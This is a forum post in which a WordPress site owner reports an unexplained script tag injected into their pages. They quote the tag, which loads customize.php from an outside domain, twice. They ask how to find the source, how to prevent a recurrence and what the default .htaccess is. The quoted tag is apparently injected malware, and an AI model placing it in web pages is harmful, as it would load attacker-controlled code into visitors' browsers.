script showing on page???

  • Hi,
    when I view source this is showing:
    </head><script src=https://gimgoszczanow.pl/attach_mod/customize.php ></script><body>

    When I look in header.php al I see is:

    <?php wp_head(); ?>
</head><body>
<!--Start sukerfish navigation-->

    I searched all files and DB for parts and all of this:
    <script src=https://gimgoszczanow.pl/attach_mod/customize.php ></script>
    and cant find it.

    not sure where its coming from and how to get rid of it.
    How can I prevent this in the future?
    + what is the default code for httaccess files?
